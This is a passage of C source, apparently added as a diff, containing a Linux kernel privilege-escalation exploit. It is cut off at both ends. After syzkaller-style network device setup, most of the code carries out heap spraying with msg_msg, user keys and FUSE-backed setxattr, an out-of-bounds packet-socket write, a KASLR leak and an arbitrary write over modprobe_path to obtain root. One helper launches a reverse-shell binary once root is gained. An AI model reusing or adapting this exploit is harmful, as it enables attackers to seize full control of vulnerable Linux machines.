WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &first_half_v6, + sizeof(first_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGPEER_A_PUBLIC_KEY, public_b, 32); + netlink_attr(&nlmsg, WGPEER_A_ENDPOINT, &endpoint_b_v4, + sizeof(endpoint_b_v4)); + netlink_attr(&nlmsg, WGPEER_A_PERSISTENT_KEEPALIVE_INTERVAL, + &persistent_keepalives[5], 2); + netlink_nest(&nlmsg, NLA_F_NESTED | WGPEER_A_ALLOWEDIPS); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v4, + sizeof(second_half_v4)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_nest(&nlmsg, NLA_F_NESTED | 0); + netlink_attr(&nlmsg, WGALLOWEDIP_A_FAMILY, &af_inet6, 2); + netlink_attr(&nlmsg, WGALLOWEDIP_A_IPADDR, &second_half_v6, + sizeof(second_half_v6)); + netlink_attr(&nlmsg, WGALLOWEDIP_A_CIDR_MASK, &half_cidr, 1); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + netlink_done(&nlmsg); + err = netlink_send(&nlmsg, sock); + if (err < 0) { + } + +error: + close(sock); +} +static void initialize_netdevices(void) +{ + char netdevsim[16]; + sprintf(netdevsim, "netdevsim%d", (int)procid); + struct { + const char* type; + const char* dev; + } devtypes[] = { + {"ip6gretap", "ip6gretap0"}, {"bridge", "bridge0"}, + {"vcan", "vcan0"}, {"bond", "bond0"}, + {"team", "team0"}, {"dummy", "dummy0"}, + {"nlmon", "nlmon0"}, {"caif", "caif0"}, + {"batadv", "batadv0"}, {"vxcan", "vxcan1"}, + {"netdevsim", netdevsim}, {"veth", 0}, + {"xfrm", "xfrm0"}, {"wireguard", "wg0"}, + {"wireguard", "wg1"}, {"wireguard", "wg2"}, + }; + const char* devmasters[] = {"bridge", "bond", "team", "batadv"}; + struct { + const char* name; + int macsize; + bool noipv6; + } devices[] = { + {"lo", ETH_ALEN}, + {"sit0", 0}, + {"bridge0", ETH_ALEN}, + {"vcan0", 0, true}, + {"tunl0", 0}, + {"gre0", 0}, + {"gretap0", ETH_ALEN}, + {"ip_vti0", 0}, + {"ip6_vti0", 0}, + {"ip6tnl0", 0}, + {"ip6gre0", 0}, + {"ip6gretap0", ETH_ALEN}, + {"erspan0", ETH_ALEN}, + {"bond0", ETH_ALEN}, + {"veth0", ETH_ALEN}, + {"veth1", ETH_ALEN}, + {"team0", ETH_ALEN}, + {"veth0_to_bridge", ETH_ALEN}, + {"veth1_to_bridge", ETH_ALEN}, + {"veth0_to_bond", ETH_ALEN}, + {"veth1_to_bond", ETH_ALEN}, + {"veth0_to_team", ETH_ALEN}, + {"veth1_to_team", ETH_ALEN}, + {"veth0_to_hsr", ETH_ALEN}, + {"veth1_to_hsr", ETH_ALEN}, + {"hsr0", 0}, + {"dummy0", ETH_ALEN}, + {"nlmon0", 0}, + {"vxcan0", 0, true}, + {"vxcan1", 0, true}, + {"caif0", ETH_ALEN}, + {"batadv0", ETH_ALEN}, + {netdevsim, ETH_ALEN}, + {"xfrm0", ETH_ALEN}, + {"veth0_virt_wifi", ETH_ALEN}, + {"veth1_virt_wifi", ETH_ALEN}, + {"virt_wifi0", ETH_ALEN}, + {"veth0_vlan", ETH_ALEN}, + {"veth1_vlan", ETH_ALEN}, + {"vlan0", ETH_ALEN}, + {"vlan1", ETH_ALEN}, + {"macvlan0", ETH_ALEN}, + {"macvlan1", ETH_ALEN}, + {"ipvlan0", ETH_ALEN}, + {"ipvlan1", ETH_ALEN}, + {"veth0_macvtap", ETH_ALEN}, + {"veth1_macvtap", ETH_ALEN}, + {"macvtap0", ETH_ALEN}, + {"macsec0", ETH_ALEN}, + {"veth0_to_batadv", ETH_ALEN}, + {"veth1_to_batadv", ETH_ALEN}, + {"batadv_slave_0", ETH_ALEN}, + {"batadv_slave_1", ETH_ALEN}, + {"geneve0", ETH_ALEN}, + {"geneve1", ETH_ALEN}, + {"wg0", 0}, + {"wg1", 0}, + {"wg2", 0}, + }; + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock == -1) + exit(1); + unsigned i; + for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++) + netlink_add_device(&nlmsg, sock, devtypes[i].type, devtypes[i].dev); + for (i = 0; i < sizeof(devmasters) / (sizeof(devmasters[0])); i++) { + char master[32], slave0[32], veth0[32], slave1[32], veth1[32]; + sprintf(slave0, "%s_slave_0", devmasters[i]); + sprintf(veth0, "veth0_to_%s", devmasters[i]); + netlink_add_veth(&nlmsg, sock, slave0, veth0); + sprintf(slave1, "%s_slave_1", devmasters[i]); + sprintf(veth1, "veth1_to_%s", devmasters[i]); + netlink_add_veth(&nlmsg, sock, slave1, veth1); + sprintf(master, "%s0", devmasters[i]); + netlink_device_change(&nlmsg, sock, slave0, false, master, 0, 0, NULL); + netlink_device_change(&nlmsg, sock, slave1, false, master, 0, 0, NULL); + } + netlink_device_change(&nlmsg, sock, "bridge_slave_0", true, 0, 0, 0, NULL); + netlink_device_change(&nlmsg, sock, "bridge_slave_1", true, 0, 0, 0, NULL); + netlink_add_veth(&nlmsg, sock, "hsr_slave_0", "veth0_to_hsr"); + netlink_add_veth(&nlmsg, sock, "hsr_slave_1", "veth1_to_hsr"); + netlink_add_hsr(&nlmsg, sock, "hsr0", "hsr_slave_0", "hsr_slave_1"); + netlink_device_change(&nlmsg, sock, "hsr_slave_0", true, 0, 0, 0, NULL); + netlink_device_change(&nlmsg, sock, "hsr_slave_1", true, 0, 0, 0, NULL); + netlink_add_veth(&nlmsg, sock, "veth0_virt_wifi", "veth1_virt_wifi"); + netlink_add_linked(&nlmsg, sock, "virt_wifi", "virt_wifi0", + "veth1_virt_wifi"); + netlink_add_veth(&nlmsg, sock, "veth0_vlan", "veth1_vlan"); + netlink_add_vlan(&nlmsg, sock, "vlan0", "veth0_vlan", 0, htons(ETH_P_8021Q)); + netlink_add_vlan(&nlmsg, sock, "vlan1", "veth0_vlan", 1, htons(ETH_P_8021AD)); + netlink_add_macvlan(&nlmsg, sock, "macvlan0", "veth1_vlan"); + netlink_add_macvlan(&nlmsg, sock, "macvlan1", "veth1_vlan"); + netlink_add_ipvlan(&nlmsg, sock, "ipvlan0", "veth0_vlan", IPVLAN_MODE_L2, 0); + netlink_add_ipvlan(&nlmsg, sock, "ipvlan1", "veth0_vlan", IPVLAN_MODE_L3S, + IPVLAN_F_VEPA); + netlink_add_veth(&nlmsg, sock, "veth0_macvtap", "veth1_macvtap"); + netlink_add_linked(&nlmsg, sock, "macvtap", "macvtap0", "veth0_macvtap"); + netlink_add_linked(&nlmsg, sock, "macsec", "macsec0", "veth1_macvtap"); + char addr[32]; + sprintf(addr, DEV_IPV4, 14 + 10); + struct in_addr geneve_addr4; + if (inet_pton(AF_INET, addr, &geneve_addr4) <= 0) + exit(1); + struct in6_addr geneve_addr6; + if (inet_pton(AF_INET6, "fc00::01", &geneve_addr6) <= 0) + exit(1); + netlink_add_geneve(&nlmsg, sock, "geneve0", 0, &geneve_addr4, 0); + netlink_add_geneve(&nlmsg, sock, "geneve1", 1, 0, &geneve_addr6); + netdevsim_add((int)procid, 4); + netlink_wireguard_setup(); + for (i = 0; i < sizeof(devices) / (sizeof(devices[0])); i++) { + char addr[32]; + sprintf(addr, DEV_IPV4, i + 10); + netlink_add_addr4(&nlmsg, sock, devices[i].name, addr); + if (!devices[i].noipv6) { + sprintf(addr, DEV_IPV6, i + 10); + netlink_add_addr6(&nlmsg, sock, devices[i].name, addr); + } + uint64_t macaddr = DEV_MAC + ((i + 10ull) << 40); + netlink_device_change(&nlmsg, sock, devices[i].name, true, 0, &macaddr, + devices[i].macsize, NULL); + } + close(sock); +} +static void initialize_netdevices_init(void) +{ + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock == -1) + exit(1); + struct { + const char* type; + int macsize; + bool noipv6; + bool noup; + } devtypes[] = { + {"nr", 7, true}, + {"rose", 5, true, true}, + }; + unsigned i; + for (i = 0; i < sizeof(devtypes) / sizeof(devtypes[0]); i++) { + char dev[32], addr[32]; + sprintf(dev, "%s%d", devtypes[i].type, (int)procid); + sprintf(addr, "172.30.%d.%d", i, (int)procid + 1); + netlink_add_addr4(&nlmsg, sock, dev, addr); + if (!devtypes[i].noipv6) { + sprintf(addr, "fe88::%02x:%02x", i, (int)procid + 1); + netlink_add_addr6(&nlmsg, sock, dev, addr); + } + int macsize = devtypes[i].macsize; + uint64_t macaddr = 0xbbbbbb + + ((unsigned long long)i << (8 * (macsize - 2))) + + (procid << (8 * (macsize - 1))); + netlink_device_change(&nlmsg, sock, dev, !devtypes[i].noup, 0, &macaddr, + macsize, NULL); + } + close(sock); +} + +static void setup_common() +{ + if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) { + } +} + +static void loop(); + +static int wait_for_loop(int pid) +{ + if (pid < 0) + exit(1); + int status = 0; + while (waitpid(-1, &status, __WALL) != pid) { + } + return WEXITSTATUS(status); +} + +static void drop_caps(void) +{ + struct __user_cap_header_struct cap_hdr = {}; + struct __user_cap_data_struct cap_data[2] = {}; + cap_hdr.version = _LINUX_CAPABILITY_VERSION_3; + cap_hdr.pid = getpid(); + if (syscall(SYS_capget, &cap_hdr, &cap_data)) + exit(1); + const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE); + cap_data[0].effective &= ~drop; + cap_data[0].permitted &= ~drop; + cap_data[0].inheritable &= ~drop; + if (syscall(SYS_capset, &cap_hdr, &cap_data)) + exit(1); +} + +static int real_uid; +static int real_gid; +__attribute__((aligned(64 << 10))) static char sandbox_stack[1 << 20]; + +static int namespace_sandbox_proc(void* arg) +{ + write_file("/proc/self/setgroups", "deny"); + if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) + exit(1); + if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) + exit(1); + initialize_netdevices_init(); + if (unshare(CLONE_NEWNET)) + exit(1); + initialize_netdevices(); + + loop(); + exit(1); +} + +static int do_sandbox_namespace(void) +{ + setup_common(); + real_uid = getuid(); + real_gid = getgid(); + mprotect(sandbox_stack, 4096, PROT_NONE); + int pid = + clone(namespace_sandbox_proc, &sandbox_stack[sizeof(sandbox_stack) - 64], + CLONE_NEWUSER | CLONE_NEWPID, 0); + return wait_for_loop(pid); +} + +uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff}; + +struct fork_args { + int n; + unsigned int time; +}; + +void fork_spary_n(int n, unsigned int time, int debug){ + int i; + int pid ; + for(i = 0;i < n;i++){ + pid = fork(); + if(pid ==0){ + ioctl(-1, 0x37778, &debug); + sleep(time); + if(getuid() == 0){ + fprintf(stderr, "[+] now get r00t\n" ); + system("id"); + system("/home/p4nda/Desktop/reverse_shell"); + } else{ + pause(); + } + } + } +} + +#include +#include +#include + +void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int sizeof_priv, unsigned int timeout) { + int v = TPACKET_V3; + int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)); + if (rv < 0) { + perror("[-] setsockopt(PACKET_VERSION)"); + exit(EXIT_FAILURE); + } + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + req.tp_feature_req_word = 0; + + rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); + if (rv < 0) { + perror("[-] setsockopt(PACKET_RX_RING)"); + exit(EXIT_FAILURE); + } +} + +int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) { + perror("[-] socket(AF_PACKET)"); + exit(EXIT_FAILURE); + } + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, + sizeof_priv, timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + sa.sll_hatype = 0; + sa.sll_pkttype = 0; + sa.sll_halen = 0; + + int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa)); + if (rv < 0) { + perror("[-] bind(AF_PACKET)"); + exit(EXIT_FAILURE); + } + + return s; +} + +void initialise_shared(shared_data **data) +{ + // place our shared data in shared memory + int prot = PROT_READ | PROT_WRITE; + int flags = MAP_SHARED | MAP_ANONYMOUS; + *data = mmap(NULL, sizeof(shared_data), prot, flags, -1, 0); + if (*data == MAP_FAILED) { + perror("mmap"); + exit(EXIT_FAILURE); + } +#ifdef DEBUG + printf("initialise_shared map %lx", *data); +#endif + (*data)->done = 0; + + // initialise mutex so it works properly in shared memory + pthread_mutexattr_t attr; + pthread_mutexattr_init(&attr); + pthread_mutexattr_setpshared(&attr, PTHREAD_PROCESS_SHARED); + pthread_mutex_init(&(*data)->mutex, &attr); + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_init(&(*data)->proc_mutex[i], &attr); +} + +int pagealloc_pad(int count, int size) { + return packet_socket_setup(size, 2048, count, 0, 100); +} + +int packet_sock_kmalloc() { + int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)); + if (s == -1) { + perror("[-] socket(SOCK_DGRAM)"); + exit(EXIT_FAILURE); + } + return s; +} + +void send_xattr_debug(void *arg) +{ + char name[256]; + void *addr = ((struct spray_argv *)arg)->addr; + int size = ((struct spray_argv *)arg)->size; + pthread_mutex_lock(&spray_lock->mutex); + spray_lock->done++; + pthread_mutex_unlock(&spray_lock->mutex); +#ifdef DEBUG + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_USER_KEY_PAYLOAD | PRINT_XATTR); + ioctl(-1, 0x37778, &debug); +#endif + syscall(__NR_setxattr, "./", "exp", addr, size, 0); +} + +void spray_4k_thread(int size, int n) +{ + pthread_t *thr = malloc(sizeof(pthread_t)); + struct spray_argv *arg = (struct spray_argv *)malloc(sizeof(struct spray_argv)); + arg->addr = fuse_mem_addr; + arg->size = size; + pthread_mutex_lock(&spray_lock->mutex); + for (int j=0; jdone++; + pthread_create(thr, NULL, send_xattr_debug, (void *) arg); + } +} + +void release_spray_4k_lock(int limit) { + pthread_mutex_unlock(&spray_lock->mutex); + while (spray_lock->done < limit) + usleep(10000); + spray_lock->done = 0; +} + +int *spray_user_key(int n, int size, int base) +{ + int payload_size = size - sizeof(struct fake_user_key_payload); + int *fd = malloc(n * sizeof(int)); + + void *addr = malloc(0x30000); + char *buf = addr; + char *name = (uint64_t)addr + 0x20000; + memcpy((void*)name, "user\000", 5); + + for (int i = 0; i < n; i++) { + release_spray_4k_lock(SLAB_4k_OBJS_PER_SLAB-2); + + memset(buf, 0x41, payload_size); + char *des = (uint64_t)addr + 0x10000ul; + sprintf((void*)des, "syz%d\x00", base*n+i); +#ifdef DEBUG + printf("add key %d\n", base); +#endif + fd[i] = syscall(__NR_add_key, name, des, buf, payload_size, -1); + if (fd[i] < 0) { + perror("add_key failed\n"); + pause(); + } + } + return fd; +} + +void init_fuse_mem(char *fuse_path, void **fuse_addr, void *base, int size) +{ + fuse_fd = open(fuse_path, O_RDWR); + if (fuse_fd < 0) { + perror("open fuse failed\n"); + exit(1); + } + if (base == NULL) + *fuse_addr = mmap(base, size, PROT_READ | PROT_WRITE, + MAP_SHARED, fuse_fd, 0); + else + *fuse_addr = mmap(base, size, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_FIXED, fuse_fd, 0); + if (*fuse_addr == MAP_FAILED) { + perror("mmap failed\n"); + exit(1); + } +#ifdef DEBUG + printf("mmap-> 0x%llx\n", *fuse_addr); +#endif +} + +void send_xattr(void *arg) +{ + void *addr = ((struct spray_argv *)arg)->addr; + int size = ((struct spray_argv *)arg)->size; + pthread_mutex_lock(&spray_lock->mutex); + spray_lock->done++; + pthread_mutex_unlock(&spray_lock->mutex); + syscall(__NR_setxattr, "./", "exp", addr, size, 0); +} + +void spray_4k(int n, int size) { + if (fuse_mem_addr == NULL) + perror("fuse_mem_addr is NULL"); + + initialise_shared(&spray_lock); + for (int k=0; kaddr = fuse_mem_addr; + arg->size = size; + hang_threads->done++; + pthread_create(&thr, NULL, send_xattr, (void *) arg); + } + pause(); + } + } + + while(spray_lock->done < n * SLAB_4k_OBJS_PER_SLAB-1) { + usleep(10000); + } + spray_lock->done = 0; +} + +void oob_write(char *payload, int size, int oob_page, int fd1, int fd2) { + struct msghdr msg; + struct iovec iov; + char *addr = NULL; + + memset(&iov, 0, sizeof(iov)); + memset(&msg, 0, sizeof(msg)); + + for (int i = 0; i < 8; i++) { + memset((void*)0x20000000+i*PAGE_SIZE+LAST_PAGE_GAP_BYTES, 0x41+i, 4096); + } + + for (int i=8; i<=oob_page; i++) { + addr = 0x20000000+i*PAGE_SIZE+LAST_PAGE_GAP_BYTES; + memset(addr, 0x0, 4096); + memcpy(addr, payload, size); + } + + iov.iov_base = (void*)0x20000000; + iov.iov_len = oob_page*PAGE_SIZE + LAST_PAGE_GAP_BYTES + size; + + msg.msg_name = 0x0; + msg.msg_namelen = 0x0; + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + msg.msg_control = 0; + msg.msg_controllen = 0; + msg.msg_flags = 0; + + if (fd1 != -1) + close(fd1); + if (fd2 != -1) + close(fd2); + + syscall(__NR_sendmsg, r[1], &msg, 0ul); +} + +bool leak_kalsr() { + int fd1, fd2, fd3, fd_vul[N_PROCS], fd_t1, fd_t2; + int num_keys = 20000 / SIZE_OF_USER_KEY_PAYLOAD; + int *key_fd; + char *leak_buf; + + // consume kmalloc-4k slabs in order to make `user_key_payload` allocate new slab from buddy allocator + spray_4k(0x50, SIZE_OF_USER_KEY_PAYLOAD); + printf("[+] spraying 4k objects\n"); + + initialise_shared(&two_loop); + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_lock(&two_loop->proc_mutex[i]); + int id = N_PROCS; + for (int i=0; iproc_mutex[id]); + break; + } + if (i==N_PROCS-1) { + // hang main proc + pthread_mutex_unlock(&two_loop->proc_mutex[0]); + pthread_mutex_lock(&two_loop->proc_mutex[N_PROCS]); + } + } + +#ifdef DEBUG + printf("id %d started\n", id); + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_USER_KEY_PAYLOAD); + ioctl(-1, 0x37778, &debug); +#endif + //pagealloc_pad(0x500, 0x8000); + //sleep(1); + fd_vul[0] = pagealloc_pad(1, 0x8000); + // reserve order 3 pages for target obj1 (user_key_payload) + fd_t1 = pagealloc_pad(1, 0x8000); + // reserve order 3 pages for target obj2 (msg_msg) + fd_t2 = pagealloc_pad(1, 0x8000); + // arrange target obj1 (user_key_payload) to memory 3 (fd3) + //spray_4k(1, SIZE_OF_USER_KEY_PAYLOAD); + spray_4k_thread(SIZE_OF_USER_KEY_PAYLOAD, SLAB_4k_OBJS_PER_SLAB-1); + close(fd_t1); + key_fd = spray_user_key(1, SIZE_OF_USER_KEY_PAYLOAD, id); + spray_4k_thread(SIZE_OF_USER_KEY_PAYLOAD, SLAB_4k_OBJS_PER_SLAB-1); + release_spray_4k_lock(SLAB_4k_OBJS_PER_SLAB-2); + // arrange target obj2 (msg_msg) to memory 4 (fd4) + //pagealloc_pad(20, 0x8000); + for (int i = 0; i < 100; i++) + { + open("/proc/self/stat", O_RDONLY); + } + close(fd_t2); + //printf("[+] Spraying msg with segments\n"); + msg_spray(SLAB_4k_OBJS_PER_SLAB * (SLAB_4k_CPU_PARTIAL) , PAGE_SIZE+32-SIZE_OF_MSG_MSGSEG, 1); + +#ifdef DEBUG + printf("id %d finished\n", id); +#endif + + if (id < N_PROCS) { + pthread_mutex_unlock(&two_loop->proc_mutex[id+1]); + pthread_mutex_lock(&two_loop->proc_mutex[id]); + } else { + for (int i=0; iproc_mutex[i]); + } + + close(fd_vul[0]); + +#ifdef DEBUG + debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_USER_KEY_PAYLOAD); + ioctl(-1, 0x37778, &debug); +#endif + + if (id == N_PROCS) { + printf("start oob write\n"); + struct fake_user_key_payload *fake_key = (struct fake_user_key_payload *)malloc(sizeof(struct fake_user_key_payload)+8); + memset(fake_key, 0, sizeof(*fake_key)); + fake_key->next = 0; + fake_key->callback = 0; + fake_key->datalen = 0x7000; + memset(fake_key+sizeof(struct fake_user_key_payload), 0x0, 0x8); + oob_write(fake_key, sizeof(*fake_key)+8, OOB_PAGE, -1, -1); + free(fake_key); + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_unlock(&two_loop->proc_mutex[i]); + } + pthread_mutex_lock(&two_loop->proc_mutex[id]); + + leak_buf = malloc(0x8000); + memset(leak_buf, 0x43, 0x8000); + if (syscall(__NR_keyctl, KEYCTL_READ, key_fd[0], leak_buf, 0x8000, 0) == -1) { + perror("keyctl failed"); + } + if (*(uint64_t*)leak_buf != 0x4141414141414141) { + for (int j=0; j<8; j++) { + uint64_t *data = (uint64_t)leak_buf + j*PAGE_SIZE - sizeof(struct fake_user_key_payload) + sizeof(struct fake_msg_msg); +#ifdef DEBUG + printf("msg %d data %llx\n", j, *data); +#endif + if (*data == 0x3737373737373737) { + struct fake_msg_msg *msg = (uint64_t)leak_buf + j*PAGE_SIZE - sizeof(struct fake_user_key_payload); + printf("[+] msg->next %llx\n", msg->next); + msg_next = msg->next; + msglist_next = msg->m_list.next; + msglist_prev = msg->m_list.prev; + break; + } + } + } + + free(leak_buf); + + + if (msg_next == NULL) { + if (id != N_PROCS) + { + two_loop->done++; + printf("[-] %d/%d threads hang\n", two_loop->done, N_PROCS + 1); + pthread_mutex_lock(&two_loop->proc_mutex[id]); + exit(1); + } + else + { + for (int i=0; i<3; i++) { + if (two_loop->done == N_PROCS) { + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_unlock(&two_loop->proc_mutex[i]); + return false; + } + sleep(1); + } + pthread_mutex_lock(&two_loop->proc_mutex[id]); + exit(1); + } + } + + + // stage 2: leak kernel address. + // Now we have a correct msg->next pointer, we can freely overwrite struct msg->m_ts + // as well as the msg->next. + if (fork() != 0) { + int status; + wait(&status); + exit(0); + } + + pagealloc_pad(0x100, 0x1000); + for (int i=0; i<50; i++) { +#ifdef DEBUG + debug = (PRINT_PAGE_FREE_DETAIL); + ioctl(-1, 0x37778, &debug); +#endif + pagealloc_pad(0x100, 0x8000); + //sleep(1); +#ifdef DEBUG + debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_MSG); + ioctl(-1, 0x37778, &debug); +#endif + int fd_msg[N_LOOP]; + int msqid_all[4096]; + printf("[+] spraying msg for OOB write\n"); + for (int i=0; i<8; i++) { + fd_vul[i] = pagealloc_pad(1, 0x8000); + fd_msg[i] = pagealloc_pad(1, 0x8000); + } + + for (int i=0; im_list.next = msglist_next; + fake_msg->m_list.prev = msglist_prev; + fake_msg->m_type = 1; + fake_msg->m_ts = 0x1fc8; + fake_msg->next = msg_next; + oob_write(fake_msg, sizeof(*fake_msg), OOB_PAGE, -1, -1); + free(fake_msg); + + leak_buf = malloc(0x2000); + for (int i=0; i 0x1000) { + for (j=1; j 0x%lx(%ld)\n", single_start, single_stop, kaslr_offset, kaslr_offset); + break; + } + } + } + if (kaslr_offset != NULL) + break; + } + + if (kaslr_offset == NULL) + continue; + break; + } + + if (kaslr_offset == NULL) { + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_unlock(&two_loop->proc_mutex[i]); + return false; + } + return true; +} + + +void fuse_sendmsg(struct spary_msg_arg *arg) +{ + int i; + int qbytes = MAX_QBYTES_IN_QUEUE; + int _msqid; + void *target = arg->dst; + int size = arg->size; + + if ((_msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { + perror("msgget"); + return false; + } + +#ifdef KERNEL_DEBUG + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_MSG | PRINT_MSG_DETAIL); + ioctl(-1, 0x37778, &debug); +#endif + pthread_mutex_lock(&spray_lock->mutex); + spray_lock->done++; + pthread_mutex_unlock(&spray_lock->mutex); + struct msgbuf_key *msg_key = target; + //printf("fuse_sendmsg %d start\n", _msqid); + msg_key->mtype = 1; + int ret = msgsnd(_msqid, msg_key, PAGE_SIZE-SIZE_OF_MSG_MSG+size, 0); + //printf("fuse_sendmsg %d done\n", _msqid); + if (ret == -1) { + perror("msgsnd error\n"); + exit(1); + } +} + +int fuse_msg_spray(int num_msg, int size, void *dst) { + int i; + initialise_shared(&spray_lock); + pthread_mutex_lock(&spray_lock->mutex); + for (i = 0; isize = size; + arg->dst = dst; + hang_threads->done++; + pthread_t *thr = malloc(sizeof(pthread_t)); + pthread_create(thr, NULL, &fuse_sendmsg, arg); + } + return i; +} + +bool arb_write(void *target_addr, int size, void *fuse_adr) +{ + int fd_vul; + int fd_msg; + printf("[+] spraying msg for arbitrary write\n"); + initialise_shared(&two_loop); + for (int i=0; i<=N_PROCS; i++) + pthread_mutex_trylock(&two_loop->proc_mutex[i]); + int id = N_PROCS; + for (int i=0; iproc_mutex[id]); + break; + } + if (i==N_PROCS-1) { + // hang main proc + pthread_mutex_unlock(&two_loop->proc_mutex[0]); + pthread_mutex_lock(&two_loop->proc_mutex[N_PROCS]); + } + } + + pagealloc_pad(0x100, 0x8000); + +#ifdef KERNEL_DEBUG + int debug = (PRINT_PAGE_ALLOC | PRINT_OOB_INFO | PRINT_PAGE_FREE_DETAIL | PRINT_MSG_DETAIL); + ioctl(-1, 0x37778, &debug); + printf("id %d started\n", id); +#endif + + fd_vul = pagealloc_pad(1, 0x8000); + fd_msg = pagealloc_pad(1, 0x8000); + msg_spray(SLAB_4k_OBJS_PER_SLAB * (SLAB_4k_CPU_PARTIAL) , PAGE_SIZE+32-SIZE_OF_MSG_MSGSEG, 1); + fuse_msg_spray(SLAB_4k_OBJS_PER_SLAB + 1, size, fuse_adr); + close(fd_msg); + release_spray_4k_lock(SLAB_4k_OBJS_PER_SLAB + 1); + usleep(10000); + + if (id != N_PROCS) + { + pthread_mutex_unlock(&two_loop->proc_mutex[id+1]); + pthread_mutex_lock(&two_loop->proc_mutex[id]); + } else { + for (int i=0; iproc_mutex[i]); + } + + close(fd_vul); + + if (id != N_PROCS) + { + pthread_mutex_lock(&two_loop->proc_mutex[id]); + } + + struct fake_msg_msg *fake_msg = (struct fake_msg_msg *)malloc(sizeof(struct fake_msg_msg)); + memset(fake_msg, 0, sizeof(*fake_msg)); + fake_msg->m_list.next = msglist_next; + fake_msg->m_list.prev = msglist_prev; + fake_msg->m_type = 1; + fake_msg->m_ts = PAGE_SIZE-SIZE_OF_MSG_MSG+size; + fake_msg->next = target_addr; + oob_write(fake_msg, sizeof(*fake_msg), OOB_PAGE, -1, -1); + free(fake_msg); + + //write(fuse_pipes[1], "A", 1); +} + + +void modprobe_trigger() +{ + execve(PROC_MODPROBE_TRIGGER, NULL, NULL); +} + +int am_i_root() +{ + struct stat buffer; + int exist = stat("/tmp/exploited", &buffer); + if(exist == 0) + return 1; + else + return 0; +} + +void modprobe_init() +{ + int fd = open(PROC_MODPROBE_TRIGGER, O_RDWR | O_CREAT); + if (fd < 0) + { + perror("trigger creation failed"); + exit(-1); + } + char root[] = "\xff\xff\xff\xff"; + write(fd, root, sizeof(root)); + close(fd); + chmod(PROC_MODPROBE_TRIGGER, 0777); +} + +void overwrite_modprobe() +{ + void *modprobe_path = addr_modprobe_path + kaslr_offset; + printf("[+] modprobe_path: 0x%llx\n", modprobe_path); + void *fuse_evil_addr; + + for (int i=0; i<50; i++) { + if (fork() != 0) + break; + + void *evil_page = mmap(0x1338000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); + init_fuse_mem("evil2/evil", &fuse_evil_addr, evil_page+0x1000, 0x1000); + if (fuse_evil_addr != (evil_page+0x1000)) + { + perror("mmap fail fuse 1"); + exit(-1); + } + void *evil_page2 = mmap(fuse_evil_addr+0x1000, 0x10000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); + struct msgbuf_key *evil_msg = fuse_evil_addr-0x8; + + arb_write(modprobe_path-8, strlen(evil_str), evil_msg); + write(fuse_pipes[1], "A", 1); + sleep(1); + modprobe_trigger(); + sleep(1); + if (am_i_root()) { + pthread_mutex_unlock(&shell_lock->mutex); + pause(); + } + printf("[+] Not root, try again\n"); + } + pause(); +} + +void loop(void) +{ + struct msghdr msg; + struct iovec iov; + struct sadb_msg *nlh; + struct sadb_ext *ehdr; + + cpu_set_t my_set; + CPU_ZERO(&my_set); + CPU_SET(0, &my_set); + if (sched_setaffinity(0, 